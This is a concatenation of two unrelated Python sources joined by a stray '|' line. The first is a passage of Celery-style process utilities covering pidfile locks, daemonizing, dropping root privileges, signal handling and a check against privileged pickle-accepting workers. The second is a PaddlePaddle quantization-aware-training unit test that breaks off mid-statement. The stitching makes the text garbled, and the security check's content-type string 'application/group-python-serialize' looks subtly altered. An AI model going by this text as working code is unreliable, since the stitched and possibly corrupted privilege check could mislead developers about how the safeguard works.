# Default working directory for daemonized processes (see DaemonContext).
DAEMON_WORKDIR = '/'

# O_EXCL so an existing pidfile is never silently overwritten; the mode
# expression evaluates to 0o644 (rw-r--r--).
PIDFILE_FLAGS = os.O_CREAT | os.O_EXCL | os.O_WRONLY
PIDFILE_MODE = ((os.R_OK | os.W_OK) << 6) | ((os.R_OK) << 3) | (os.R_OK)

PIDLOCKED = """ERROR: Pidfile ({0}) already exists.
Seems we're already running? (pid: {1})"""

_range = namedtuple('_range', ('start', 'stop'))

ROOT_DISALLOWED = """\
Running a worker with superuser privileges when the
worker accepts messages serialized with pickle is a very bad idea!
If you really want to continue then you have to set the C_FORCE_ROOT
environment variable (but please think about this before you do).
User information: uid={uid} euid={euid} gid={gid} egid={egid}
"""

ROOT_DISCOURAGED = """\
You're running the worker with superuser privileges: this is
absolutely not recommended!
Please specify a different user using the --uid option.
User information: uid={uid} euid={euid} gid={gid} egid={egid}
"""

ASSUMING_ROOT = """\
An entry for the specified gid or egid was not found.
We're assuming this is a potential security issue.
"""

# Names of all signals exposed by the signal module ('SIGTERM', ...),
# plus the reverse mapping from signal number to name.
SIGNAMES = {
    sig for sig in dir(_signal)
    if sig.startswith('SIG') and '_' not in sig
}
SIGMAP = {getattr(_signal, name): name for name in SIGNAMES}
def isatty(fh):
    """Return true if *fh* is connected to a terminal.

    Returns None when *fh* has no ``isatty`` method.
    """
    try:
        return fh.isatty()
    except AttributeError:
        return None
def pyimplementation():
    """Return a string identifying the running Python implementation."""
    # Modern interpreters expose this directly.
    if hasattr(_platform, 'python_implementation'):
        return _platform.python_implementation()
    # Fallbacks for very old interpreters.
    if sys.platform.startswith('java'):
        return 'Jython ' + sys.platform
    if hasattr(sys, 'pypy_version_info'):
        info = sys.pypy_version_info
        version = '.'.join(str(part) for part in info[:3])
        if info[3:]:
            version += '-' + ''.join(str(part) for part in info[3:])
        return 'PyPy ' + version
    return 'CPython'
class LockFailed(Exception):
    """Raised if a PID lock can't be acquired.

    See :meth:`Pidfile.acquire` and :meth:`Pidfile.write_pid`.
    """
class Pidfile:
    """Pidfile.

    This is the type returned by :func:`create_pidlock`.

    See Also:
        Best practice is to not use this directly but rather use
        the :func:`create_pidlock` function instead:
        more convenient and also removes stale pidfiles (when
        the process holding the lock is no longer running).
    """

    #: Path to the pid lock file.
    path = None

    def __init__(self, path):
        self.path = os.path.abspath(path)

    def acquire(self):
        """Acquire lock."""
        try:
            self.write_pid()
        except OSError as exc:
            # Re-raise as LockFailed while keeping the original traceback.
            reraise(LockFailed, LockFailed(str(exc)), sys.exc_info()[2])
        return self
    __enter__ = acquire

    def is_locked(self):
        """Return true if the pid lock exists."""
        return os.path.exists(self.path)

    def release(self, *args):
        """Release lock."""
        self.remove()
    __exit__ = release

    def read_pid(self):
        """Read and return the current pid.

        Raises:
            ValueError: if the pidfile is partial or malformed.
        """
        with ignore_errno('ENOENT'):
            with open(self.path) as fh:
                line = fh.readline()
                # A completely written pidfile ends in '\n'; a line unchanged
                # by strip() has no newline and is considered partial.
                if line.strip() == line:  # must contain '\n'
                    raise ValueError(
                        f'Partial or invalid pidfile {self.path}')
                try:
                    return int(line.strip())
                except ValueError:
                    raise ValueError(
                        f'pidfile {self.path} contents invalid.')

    def remove(self):
        """Remove the lock."""
        # Missing file or no permission means there is nothing to release.
        with ignore_errno(errno.ENOENT, errno.EACCES):
            os.unlink(self.path)

    def remove_if_stale(self):
        """Remove the lock if the process isn't running.

        I.e. the process does not respond to the signal.
        """
        try:
            pid = self.read_pid()
        except ValueError:
            print('Broken pidfile found - Removing it.', file=sys.stderr)
            self.remove()
            return True
        if not pid:
            self.remove()
            return True
        try:
            # Signal 0 only probes for process existence/permission.
            os.kill(pid, 0)
        except os.error as exc:
            if exc.errno == errno.ESRCH or exc.errno == errno.EPERM:
                print('Stale pidfile exists - Removing it.', file=sys.stderr)
                self.remove()
                return True
        except SystemError:
            print('Stale pidfile exists - Removing it.', file=sys.stderr)
            self.remove()
            return True
        return False

    def write_pid(self):
        # O_EXCL in PIDFILE_FLAGS makes this fail rather than overwrite an
        # existing pidfile; the content is re-read below to detect races.
        pid = os.getpid()
        content = f'{pid}\n'
        pidfile_fd = os.open(self.path, PIDFILE_FLAGS, PIDFILE_MODE)
        pidfile = os.fdopen(pidfile_fd, 'w')
        try:
            pidfile.write(content)
            # flush and sync so that the re-read below works.
            pidfile.flush()
            try:
                os.fsync(pidfile_fd)
            except AttributeError:  # pragma: no cover
                pass
        finally:
            pidfile.close()
        rfh = open(self.path)
        try:
            if rfh.read() != content:
                raise LockFailed(
                    "Inconsistency: Pidfile content doesn't match at re-read")
        finally:
            rfh.close()


PIDFile = Pidfile  # noqa: E305 XXX compat alias
def create_pidlock(pidfile):
    """Create and verify pidfile.

    If the pidfile already exists the program exits with an error message,
    however if the process it refers to isn't running anymore, the pidfile
    is deleted and the program continues.

    This function will automatically install an :mod:`atexit` handler
    to release the lock at exit, you can skip this by calling
    :func:`_create_pidlock` instead.

    Returns:
        Pidfile: used to manage the lock.

    Example:
        >>> pidlock = create_pidlock('/var/run/app.pid')
    """
    pidlock = _create_pidlock(pidfile)
    # Make sure the lock is released even on unclean interpreter shutdown.
    atexit.register(pidlock.release)
    return pidlock
def _create_pidlock(pidfile):
    """Acquire the pid lock, exiting with EX_CANTCREAT if it is held.

    Stale locks (owning process gone) are removed by remove_if_stale()
    and acquisition proceeds.
    """
    pidlock = Pidfile(pidfile)
    if pidlock.is_locked() and not pidlock.remove_if_stale():
        print(PIDLOCKED.format(pidfile, pidlock.read_pid()), file=sys.stderr)
        raise SystemExit(EX_CANTCREAT)
    pidlock.acquire()
    return pidlock
def fd_by_path(paths):
    """Return a list of file descriptors.

    This method returns list of file descriptors corresponding to
    file paths passed in paths variable.

    Arguments:
        paths: List[str]: List of file paths.

    Returns:
        List[int]: List of file descriptors.

    Example:
        >>> keep = fd_by_path(['/dev/urandom', '/my/precious/'])
    """
    # Record (st_ino, st_dev) for each path so open descriptors can be
    # matched by the file they refer to, not by pathname.
    stats = set()
    for path in paths:
        try:
            fd = os.open(path, os.O_RDONLY)
        except OSError:
            # Path missing or unreadable: nothing to match for it.
            continue
        try:
            stats.add(os.fstat(fd)[1:3])
        finally:
            os.close(fd)

    def fd_in_stats(fd):
        # True when descriptor fd refers to one of the recorded files.
        try:
            return os.fstat(fd)[1:3] in stats
        except OSError:
            return False

    # Scan the possible descriptor range and keep matching ones.
    return [_fd for _fd in range(get_fdmax(2048)) if fd_in_stats(_fd)]
class DaemonContext:
    """Context manager daemonizing the process."""

    # Guard flag so open()/close() are idempotent.
    _is_open = False

    def __init__(self, pidfile=None, workdir=None, umask=None,
                 fake=False, after_chdir=None, after_forkers=True,
                 **kwargs):
        if isinstance(umask, str):
            # octal or decimal, depending on initial zero.
            umask = int(umask, 8 if umask.startswith('0') else 10)
        self.workdir = workdir or DAEMON_WORKDIR
        self.umask = umask
        # fake=True skips forking and fd juggling (debugging aid).
        self.fake = fake
        self.after_chdir = after_chdir
        self.after_forkers = after_forkers
        self.stdfds = (sys.stdin, sys.stdout, sys.stderr)

    def redirect_to_null(self, fd):
        # Point the given descriptor at /dev/null (no-op for fd=None).
        if fd is not None:
            dest = os.open(os.devnull, os.O_RDWR)
            os.dup2(dest, fd)

    def open(self):
        # Detach, switch workdir/umask, then close inherited descriptors
        # and silence the standard streams.
        if not self._is_open:
            if not self.fake:
                self._detach()
            os.chdir(self.workdir)
            if self.umask is not None:
                os.umask(self.umask)
            if self.after_chdir:
                self.after_chdir()
            if not self.fake:
                # We need to keep /dev/urandom from closing because
                # shelve needs it, and Beat needs shelve to start.
                keep = list(self.stdfds) + fd_by_path(['/dev/urandom'])
                close_open_fds(keep)
                for fd in self.stdfds:
                    self.redirect_to_null(maybe_fileno(fd))
            if self.after_forkers and mputil is not None:
                mputil._run_after_forkers()
            self._is_open = True
    __enter__ = open

    def close(self, *args):
        if self._is_open:
            self._is_open = False
    __exit__ = close

    def _detach(self):
        # Double fork: parent and intermediate child exit, leaving the
        # surviving process in a new session (setsid).
        if os.fork() == 0:  # first child
            os.setsid()  # create new session
            if os.fork() > 0:  # pragma: no cover
                # second child
                os._exit(0)
        else:
            os._exit(0)
        return self
def detached(logfile=None, pidfile=None, uid=None, gid=None, umask=0,
             workdir=None, fake=False, **opts):
    """Detach the current process in the background (daemonize).

    Arguments:
        logfile (str): Optional log file.
            The ability to write to this file
            will be verified before the process is detached.
        pidfile (str): Optional pid file.
            The pidfile won't be created,
            as this is the responsibility of the child. But the process will
            exit if the pid lock exists and the pid written is still running.
        uid (int, str): Optional user id or user name to change
            effective privileges to.
        gid (int, str): Optional group id or group name to change
            effective privileges to.
        umask (str, int): Optional umask that'll be effective in
            the child process.
        workdir (str): Optional new working directory.
        fake (bool): Don't actually detach, intended for debugging purposes.
        **opts (Any): Ignored.

    Example:
        >>> from celery.platforms import detached, create_pidlock
        >>> with detached(
        ...     logfile='/var/log/app.log',
        ...     pidfile='/var/run/app.pid',
        ...     uid='nobody'):
        ... # Now in detached child process with effective user set to nobody,
        ... # and we know that our logfile can be written to, and that
        ... # the pidfile isn't locked.
        ... pidlock = create_pidlock('/var/run/app.pid')
        ...
        ... # Run the program
        ... program.run(logfile='/var/log/app.log')
    """
    if not resource:
        raise RuntimeError('This platform does not support detach.')
    workdir = os.getcwd() if workdir is None else workdir
    signals.reset('SIGCLD')  # Make sure SIGCLD is using the default handler.
    # Drop privileges before forking, so the child starts unprivileged.
    maybe_drop_privileges(uid=uid, gid=gid)

    def after_chdir_do():
        # Since without stderr any errors will be silently suppressed,
        # we need to know that we have access to the logfile.
        logfile and open(logfile, 'a').close()
        # Doesn't actually create the pidfile, but makes sure it's not stale.
        if pidfile:
            _create_pidlock(pidfile).release()

    return DaemonContext(
        umask=umask, workdir=workdir, fake=fake, after_chdir=after_chdir_do,
    )
def parse_uid(uid):
    """Parse user id.

    Arguments:
        uid (str, int): Actual uid, or the username of a user.

    Returns:
        int: The actual uid.

    Raises:
        KeyError: if a username was given and no such user exists.
    """
    # Numeric ids (or numeric strings) pass straight through.
    try:
        return int(uid)
    except ValueError:
        pass
    # Otherwise look the username up in the password database.
    try:
        return pwd.getpwnam(uid).pw_uid
    except (AttributeError, KeyError):
        raise KeyError(f'User does not exist: {uid}')
def parse_gid(gid):
    """Parse group id.

    Arguments:
        gid (str, int): Actual gid, or the name of a group.

    Returns:
        int: The actual gid of the group.

    Raises:
        KeyError: if a group name was given and no such group exists.
    """
    # Numeric ids (or numeric strings) pass straight through.
    try:
        return int(gid)
    except ValueError:
        pass
    # Otherwise look the group name up in the group database.
    try:
        return grp.getgrnam(gid).gr_gid
    except (AttributeError, KeyError):
        raise KeyError(f'Group does not exist: {gid}')
def _setgroups_hack(groups):
    # :fun:`setgroups` may have a platform-dependent limit,
    # and it's not always possible to know in advance what this limit
    # is, so we use this ugly hack stolen from glibc.
    groups = groups[:]
    while 1:
        try:
            return os.setgroups(groups)
        except ValueError:  # error from Python's check.
            if len(groups) <= 1:
                raise
            # Shrink the list by one and retry.
            groups[:] = groups[:-1]
        except OSError as exc:  # error from the OS.
            if exc.errno != errno.EINVAL or len(groups) <= 1:
                raise
            # EINVAL: too many groups -- shrink the list by one and retry.
            groups[:] = groups[:-1]
def setgroups(groups):
    """Set active groups from a list of group ids."""
    max_groups = None
    try:
        max_groups = os.sysconf('SC_NGROUPS_MAX')
    except Exception:  # pylint: disable=broad-except
        # Platform doesn't expose the limit; groups[:None] keeps them all.
        pass
    try:
        return _setgroups_hack(groups[:max_groups])
    except OSError as exc:
        if exc.errno != errno.EPERM:
            raise
        # EPERM is tolerated only if we are already in every requested group.
        if any(group not in groups for group in os.getgroups()):
            # we shouldn't be allowed to change to this group.
            raise
def initgroups(uid, gid):
    """Init process group permissions.

    Compat version of :func:`os.initgroups` that was first
    added to Python 2.7.
    """
    if not pwd:  # pragma: no cover
        return
    username = pwd.getpwuid(uid)[0]
    if hasattr(os, 'initgroups'):  # Python 2.7+
        return os.initgroups(username, gid)
    # Fallback: gather all groups the user belongs to and set them.
    groups = [gr.gr_gid for gr in grp.getgrall()
              if username in gr.gr_mem]
    setgroups(groups)
def setgid(gid):
    """Version of :func:`os.setgid` supporting group names."""
    # parse_gid resolves a group name to its numeric gid.
    os.setgid(parse_gid(gid))
def setuid(uid):
    """Version of :func:`os.setuid` supporting usernames."""
    # parse_uid resolves a username to its numeric uid.
    os.setuid(parse_uid(uid))
def maybe_drop_privileges(uid=None, gid=None):
    """Change process privileges to new user/group.

    If UID and GID is specified, the real user/group is changed.

    If only UID is specified, the real user is changed, and the group is
    changed to the users primary group.

    If only GID is specified, only the group is changed.
    """
    if sys.platform == 'win32':
        # Windows has no POSIX uid/gid model; nothing to drop.
        return
    if os.geteuid():
        # no point trying to setuid unless we're root.
        if not os.getuid():
            raise SecurityError('contact support')
    uid = uid and parse_uid(uid)
    gid = gid and parse_gid(gid)
    if uid:
        _setuid(uid, gid)
    else:
        gid and setgid(gid)
    # Paranoid check: after dropping we must no longer be root.
    if uid and not os.getuid() and not os.geteuid():
        raise SecurityError('Still root uid after drop privileges!')
    if gid and not os.getgid() and not os.getegid():
        raise SecurityError('Still root gid after drop privileges!')
def _setuid(uid, gid):
    """Set real uid/gid, then verify privileges cannot be regained."""
    # If GID isn't defined, get the primary GID of the user.
    if not gid and pwd:
        gid = pwd.getpwuid(uid).pw_gid
    # Must set the GID before initgroups(), as setgid()
    # is known to zap the group list on some platforms.
    # setgid must happen before setuid (otherwise the setgid operation
    # may fail because of insufficient privileges and possibly stay
    # in a privileged group).
    setgid(gid)
    initgroups(uid, gid)
    # at last:
    setuid(uid)
    # ... and make sure privileges cannot be restored:
    try:
        setuid(0)
    except OSError as exc:
        if exc.errno != errno.EPERM:
            raise
        # we should get here: cannot restore privileges,
        # everything was fine.
    else:
        raise SecurityError(
            'non-root user able to restore privileges after setuid.')
class Signals:
    """Convenience interface to :mod:`signals`.

    If the requested signal isn't supported on the current platform,
    the operation will be ignored.

    Example:
        >>> from celery.platforms import signals
        >>> from proj.handlers import my_handler
        >>> signals['INT'] = my_handler
        >>> signals['INT']
        my_handler
        >>> signals.supported('INT')
        True
        >>> signals.signum('INT')
        2
        >>> signals.ignore('USR1')
        >>> signals['USR1'] == signals.ignored
        True
        >>> signals.reset('USR1')
        >>> signals['USR1'] == signals.default
        True
        >>> from proj.handlers import exit_handler, hup_handler
        >>> signals.update(INT=exit_handler,
        ...                TERM=exit_handler,
        ...                HUP=hup_handler)
    """

    ignored = _signal.SIG_IGN
    default = _signal.SIG_DFL

    # arm_alarm: pick the best available sub-second alarm implementation.
    if hasattr(_signal, 'setitimer'):
        def arm_alarm(self, seconds):
            # setitimer supports fractional seconds.
            _signal.setitimer(_signal.ITIMER_REAL, seconds)
    else:  # pragma: no cover
        try:
            from itimer import alarm as _itimer_alarm  # noqa
        except ImportError:
            def arm_alarm(self, seconds):  # noqa
                # Plain alarm() only handles whole seconds; round up.
                _signal.alarm(math.ceil(seconds))
        else:  # pragma: no cover
            def arm_alarm(self, seconds):  # noqa
                return _itimer_alarm(seconds)  # noqa

    def reset_alarm(self):
        """Cancel any pending alarm; returns the seconds that remained."""
        return _signal.alarm(0)

    def supported(self, name):
        """Return true value if signal by ``name`` exists on this platform."""
        try:
            self.signum(name)
        except AttributeError:
            return False
        else:
            return True

    def signum(self, name):
        """Get signal number by name (ints pass through unchanged)."""
        if isinstance(name, numbers.Integral):
            return name
        if not isinstance(name, str) \
                or not name.isupper():
            raise TypeError('signal name must be uppercase string.')
        if not name.startswith('SIG'):
            name = 'SIG' + name
        return getattr(_signal, name)

    def reset(self, *signal_names):
        """Reset signals to the default signal handler.

        Does nothing if the platform has no support for signals,
        or the specified signal in particular.
        """
        self.update((sig, self.default) for sig in signal_names)

    def ignore(self, *names):
        """Ignore signal using :const:`SIG_IGN`.

        Does nothing if the platform has no support for signals,
        or the specified signal in particular.
        """
        self.update((sig, self.ignored) for sig in names)

    def __getitem__(self, name):
        """Return the currently installed handler for signal ``name``."""
        return _signal.getsignal(self.signum(name))

    def __setitem__(self, name, handler):
        """Install signal handler.

        Does nothing if the current platform has no support for signals,
        or the specified signal in particular.
        """
        try:
            _signal.signal(self.signum(name), handler)
        except (AttributeError, ValueError):
            # Unsupported signal or invalid context: silently ignore.
            pass

    def update(self, _d_=None, **sigmap):
        """Set signal handlers from a mapping."""
        for name, handler in dict(_d_ or {}, **sigmap).items():
            self[name] = handler
# Module-level singleton through which signal handlers are installed,
# plus the historical function-style aliases.
signals = Signals()
get_signal = signals.signum # compat
install_signal_handler = signals.__setitem__ # compat
reset_signal = signals.reset # compat
ignore_signal = signals.ignore # compat
def signal_name(signum):
    """Return name of signal from signal number (e.g. ``15`` -> ``'TERM'``).

    Raises KeyError for numbers that are not known signals.
    """
    # SIGMAP values are 'SIG*' names; strip the three-character prefix.
    return SIGMAP[signum][3:]
def strargv(argv):
    """Join the command-line arguments of *argv* into one string.

    Skips the program name, and additionally the subcommand when the
    program name contains 'manage' (Django-style invocation).
    """
    skip = 2 if 'manage' in argv[0] else 1
    return ' '.join(argv[skip:]) if len(argv) > skip else ''
def set_process_title(progname, info=None):
    """Set the :command:`ps` name for the currently running process.

    Only works if :pypi:`setproctitle` is installed; the composed title
    is returned either way.
    """
    title = f'[{progname}]'
    if info:
        title = f'{title} {info}'
    if _setproctitle:
        _setproctitle.setproctitle(safe_str(title))
    return title
# Honor the NOSETPS environment variable by disabling title changes entirely.
if os.environ.get('NOSETPS'):  # pragma: no cover
    def set_mp_process_title(*a, **k):
        """Disabled feature."""
else:
    def set_mp_process_title(progname, info=None, hostname=None):  # noqa
        """Set the :command:`ps` name from the current process name.

        Only works if :pypi:`setproctitle` is installed.
        """
        # Embed hostname and multiprocessing process name so each pool
        # worker is distinguishable in `ps` output.
        if hostname:
            progname = f'{progname}: {hostname}'
        name = current_process().name if current_process else 'MainProcess'
        return set_process_title(f'{progname}:{name}', info=info)
def get_errno_name(n):
    """Get errno for string (e.g., ``ENOENT``); integers pass through."""
    return getattr(errno, n) if isinstance(n, str) else n
@contextmanager
def ignore_errno(*errnos, **kwargs):
    """Context manager to ignore specific POSIX error codes.

    Takes a list of error codes to ignore: this can be either
    the name of the code, or the code integer itself::

        >>> with ignore_errno('ENOENT'):
        ...     with open('foo', 'r') as fh:
        ...         return fh.read()

        >>> with ignore_errno(errno.ENOENT, errno.EPERM):
        ...    pass

    Arguments:
        types (Tuple[Exception]): A tuple of exceptions to ignore
            (when the errno matches).  Defaults to :exc:`Exception`.
    """
    types = kwargs.get('types') or (Exception,)
    # BUG FIX (readability/shadowing): the original comprehension used
    # `errno` as its loop variable, shadowing the `errno` module inside
    # the comprehension; renamed to `code`.
    errnos = [get_errno_name(code) for code in errnos]
    try:
        yield
    except types as exc:
        # Only exceptions carrying a matching errno attribute are ignored.
        if not hasattr(exc, 'errno'):
            raise
        if exc.errno not in errnos:
            raise
def check_privileges(accept_content):
    """Warn, or raise :exc:`SecurityError`, when running with elevated
    (root / sudo / wheel) privileges.

    Accepting pickle-based content while privileged is treated as a hard
    error (see :func:`_warn_or_raise_security_error`).
    """
    if grp is None or pwd is None:
        # No POSIX user/group database on this platform (e.g. Windows):
        # nothing to check.
        return
    pickle_or_serialize = ('pickle' in accept_content
                           or 'application/group-python-serialize' in accept_content)
    # 65535 acts as a "nobody"-style sentinel when the accessor is missing.
    uid = os.getuid() if hasattr(os, 'getuid') else 65535
    gid = os.getgid() if hasattr(os, 'getgid') else 65535
    euid = os.geteuid() if hasattr(os, 'geteuid') else 65535
    egid = os.getegid() if hasattr(os, 'getegid') else 65535
    if hasattr(os, 'fchown'):
        # fchown present but the id accessors missing is an inconsistent
        # platform API -- refuse to continue.
        if not all(hasattr(os, attr)
                   for attr in ('getuid', 'getgid', 'geteuid', 'getegid')):
            raise SecurityError('suspicious platform, contact support')
    # Get the group database entry for the current user's group and effective
    # group id using grp.getgrgid() method
    # We must handle the case where either the gid or the egid are not found.
    try:
        gid_entry = grp.getgrgid(gid)
        egid_entry = grp.getgrgid(egid)
    except KeyError:
        # Unknown group ids: assume the worst (root) and apply the policy.
        warnings.warn(SecurityWarning(ASSUMING_ROOT))
        _warn_or_raise_security_error(egid, euid, gid, uid,
                                      pickle_or_serialize)
        return
    # Get the group and effective group name based on gid
    gid_grp_name = gid_entry[0]
    egid_grp_name = egid_entry[0]
    # Create lists to use in validation step later.
    gids_in_use = (gid_grp_name, egid_grp_name)
    groups_with_security_risk = ('sudo', 'wheel')
    is_root = uid == 0 or euid == 0
    # Confirm that the gid and egid are not one that
    # can be used to escalate privileges.
    if is_root or any(group in gids_in_use
                      for group in groups_with_security_risk):
        _warn_or_raise_security_error(egid, euid, gid, uid,
                                      pickle_or_serialize)
def _warn_or_raise_security_error(egid, euid, gid, uid, pickle_or_serialize):
    """Raise :exc:`SecurityError` for pickle-capable privileged workers
    (unless ``C_FORCE_ROOT`` is set); otherwise emit a warning only."""
    force_root = os.environ.get('C_FORCE_ROOT', False)
    ids = {'uid': uid, 'euid': euid, 'gid': gid, 'egid': egid}
    if pickle_or_serialize and not force_root:
        raise SecurityError(ROOT_DISALLOWED.format(**ids))
    warnings.warn(SecurityWarning(ROOT_DISCOURAGED.format(**ids)))
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import numpy as np
import random
import unittest
import logging
import paddle
import paddle.nn as nn
from paddle.optimizer import Adam
from paddle.fluid.contrib.slim.quantization import ImperativeQuantAware
from paddle.fluid.contrib.slim.quantization import QuantizationTransformPass
from paddle.nn import Sequential
from paddle.fluid.dygraph import Conv2D
from paddle.fluid.dygraph import Pool2D
from paddle.fluid.dygraph import Linear
from paddle.nn.quant.quant_layers import QuantizedConv2DTranspose
from paddle.fluid.log_helper import get_logger
from paddle.fluid.framework import _test_eager_guard
# Force single-CPU execution for this test; must be set before Paddle
# initialises its executor.
os.environ["CPU_NUM"] = "1"
_logger = get_logger(__name__,
                     logging.INFO,
                     fmt='%(asctime)s-%(levelname)s: %(message)s')
class PACT(nn.Layer):
    """PACT-style preprocess layer with a single learnable clipping
    threshold ``alpha`` (initialised to ``init_value``)."""
    def __init__(self, init_value=20):
        super(PACT, self).__init__()
        alpha_attr = paddle.ParamAttr(
            name=self.full_name() + ".pact",
            initializer=paddle.nn.initializer.Constant(value=init_value))
        self.alpha = self.create_parameter(shape=[1],
                                           attr=alpha_attr,
                                           dtype='float32')
    def forward(self, x):
        # Clip x into [-alpha, alpha]: subtract the excess above alpha and
        # add back the deficit below -alpha (differentiable w.r.t. alpha).
        out_left = paddle.nn.functional.relu(x - self.alpha)
        out_right = paddle.nn.functional.relu(-self.alpha - x)
        x = x - out_left + out_right
        return x
class CustomQAT(nn.Layer):
    """User-defined fake-quantization layer used to exercise the
    ``act_quantize_layer`` / ``weight_quantize_layer`` hooks.

    ``upper``/``lower`` track running clip bounds (EMA of the learnable
    ``u_param``/``l_param``); ``alpha_param`` shapes the soft-quantization
    tanh transfer in ``phi_function``.
    """
    def __init__(self):
        super(CustomQAT, self).__init__()
        attr = paddle.ParamAttr(initializer=paddle.nn.initializer.Constant(
            value=1.0))
        self.u_param = self.create_parameter(shape=[1],
                                             attr=attr,
                                             dtype='float32')
        self.l_param = self.create_parameter(shape=[1],
                                             attr=attr,
                                             dtype='float32')
        self.alpha_param = self.create_parameter(shape=[1],
                                                 attr=attr,
                                                 dtype='float32')
        # Running bounds are updated in forward(), not by the optimizer.
        self.upper = self.create_parameter(shape=[1],
                                           attr=attr,
                                           dtype='float32')
        self.upper.stop_gradient = True
        self.lower = self.create_parameter(shape=[1],
                                           attr=attr,
                                           dtype='float32')
        self.lower.stop_gradient = True
    def forward(self, x):
        def clip(x, upper, lower):
            # Differentiable clamp of x into [lower, upper].
            x = x + paddle.nn.functional.relu(lower - x)
            x = x - paddle.nn.functional.relu(x - upper)
            return x
        def phi_function(x, mi, alpha, delta):
            # Soft staircase transfer centred on mi with sharpness 1/delta.
            s = 1 / (1 - alpha)
            k = paddle.log(2 / alpha - 1) * (1 / delta)
            x = (paddle.tanh((x - mi) * k)) * s
            return x
        def dequantize(x, lower_bound, delta, interval):
            # Map the soft-quantized value back to the original range.
            x = ((x + 1) / 2 + interval) * delta + lower_bound
            return x
        bit = 8
        bit_range = 2**bit - 1
        # EMA update of the running clip bounds (decay 0.9).
        paddle.assign(self.upper * 0.9 + self.u_param * 0.1, self.upper)
        paddle.assign(self.lower * 0.9 + self.l_param * 0.1, self.lower)
        x = clip(x, self.upper, self.lower)
        delta = (self.upper - self.lower) / bit_range
        interval = (x - self.lower) / delta
        mi = (interval + 0.5) * delta + self.l_param
        x = phi_function(x, mi, self.alpha_param, delta)
        x = dequantize(x, self.l_param, delta, interval)
        return x
class ModelForConv2dT(nn.Layer):
    """Tiny Conv2DTranspose + Linear model, used only to exercise
    transpose-conv quantization for CI coverage."""
    def __init__(self, num_classes=10):
        super(ModelForConv2dT, self).__init__()
        self.features = nn.Conv2DTranspose(4, 6, (3, 3))
        self.fc = Linear(input_dim=600, output_dim=num_classes)
    def forward(self, inputs):
        x = self.features(inputs)
        # Flatten all dims after the batch axis before the classifier.
        x = paddle.flatten(x, 1)
        x = self.fc(x)
        return x
class ImperativeLenet(paddle.nn.Layer):
    """LeNet-style CNN for MNIST (1x28x28 input), built with the legacy
    ``paddle.fluid.dygraph`` Conv2D/Pool2D/Linear layers."""
    def __init__(self, num_classes=10, classifier_activation='softmax'):
        super(ImperativeLenet, self).__init__()
        self.features = Sequential(
            Conv2D(num_channels=1,
                   num_filters=6,
                   filter_size=3,
                   stride=1,
                   padding=1),
            Pool2D(pool_size=2, pool_type='max', pool_stride=2),
            Conv2D(num_channels=6,
                   num_filters=16,
                   filter_size=5,
                   stride=1,
                   padding=0),
            Pool2D(pool_size=2, pool_type='max', pool_stride=2))
        # 16 * 5 * 5 feature maps -> 400 inputs to the classifier head.
        self.fc = Sequential(
            Linear(input_dim=400, output_dim=120),
            Linear(input_dim=120, output_dim=84),
            Linear(input_dim=84,
                   output_dim=num_classes,
                   act=classifier_activation))
    def forward(self, inputs):
        x = self.features(inputs)
        x = paddle.flatten(x, 1)
        x = self.fc(x)
        return x
class TestUserDefinedActPreprocess(unittest.TestCase):
    """QAT smoke test using a user-defined activation preprocess layer.

    Subclasses only override setUp() to plug the custom layer into a
    different ImperativeQuantAware hook.
    """
    def setUp(self):
        _logger.info("test act_preprocess")
        self.imperative_qat = ImperativeQuantAware(act_preprocess_layer=PACT)
    def func_quant_aware_training(self):
        """Quantize LeNet, run one training batch and one eval pass."""
        imperative_qat = self.imperative_qat
        seed = 1
        np.random.seed(seed)
        paddle.static.default_main_program().random_seed = seed
        paddle.static.default_startup_program().random_seed = seed
        lenet = ImperativeLenet()
        fixed_state = {}
        param_init_map = {}
        # Re-initialise all parameters deterministically: zeros for biases,
        # small gaussian noise for weights.
        for name, param in lenet.named_parameters():
            p_shape = param.numpy().shape
            p_value = param.numpy()
            if name.endswith("bias"):
                value = np.zeros_like(p_value).astype('float32')
            else:
                value = np.random.normal(
                    loc=0.0, scale=0.01,
                    size=np.product(p_shape)).reshape(p_shape).astype('float32')
            fixed_state[name] = value
            param_init_map[param.name] = value
        lenet.set_dict(fixed_state)
        # In-place rewrite of the model with fake-quant wrappers.
        imperative_qat.quantize(lenet)
        adam = Adam(learning_rate=0.001, parameters=lenet.parameters())
        dynamic_loss_rec = []
        #for CI coverage
        conv_transpose = ModelForConv2dT()
        imperative_qat.quantize(conv_transpose)
        x_var = paddle.uniform((2, 4, 8, 8), dtype='float32', min=-1., max=1.)
        conv_transpose(x_var)
        def train(model):
            """Train for a single batch (note the ``break``) to keep CI fast."""
            adam = Adam(learning_rate=0.001, parameters=model.parameters())
            epoch_num = 1
            for epoch in range(epoch_num):
                model.train()
                for batch_id, data in enumerate(train_reader()):
                    x_data = np.array([x[0].reshape(1, 28, 28)
                                       for x in data]).astype('float32')
                    y_data = np.array([x[1] for x in data
                                       ]).astype('int64').reshape(-1, 1)
                    img = paddle.to_tensor(x_data)
                    label = paddle.to_tensor(y_data)
                    out = model(img)
                    acc = paddle.metric.accuracy(out, label, k=1)
                    loss = nn.functional.loss.cross_entropy(out, label)
                    avg_loss = paddle.mean(loss)
                    avg_loss.backward()
                    adam.minimize(avg_loss)
                    model.clear_gradients()
                    if batch_id % 50 == 0:
                        _logger.info(
                            "Train | At epoch {} step {}: loss = {:}, acc= {:}".
                            format(epoch, batch_id, avg_loss.numpy(),
                                   acc.numpy()))
                    break
        def test(model):
            """Evaluate top-1/top-5 accuracy over the test reader."""
            model.eval()
            avg_acc = [[], []]
            for batch_id, data in enumerate(test_reader()):
                x_data = np.array([x[0].reshape(1, 28, 28)
                                   for x in data]).astype('float32')
                y_data = np.array([x[1] for x in data
                                   ]).astype('int64').reshape(-1, 1)
                img = paddle.to_tensor(x_data)
                label = paddle.to_tensor(y_data)
                out = model(img)
                acc_top1 = paddle.metric.accuracy(input=out, label=label, k=1)
                acc_top5 = paddle.metric.accuracy(input=out, label=label, k=5)
                avg_acc[0].append(acc_top1.numpy())
                avg_acc[1].append(acc_top5.numpy())
                if batch_id % 100 == 0:
                    _logger.info(
                        "Test | step {}: acc1 = {:}, acc5 = {:}".format(
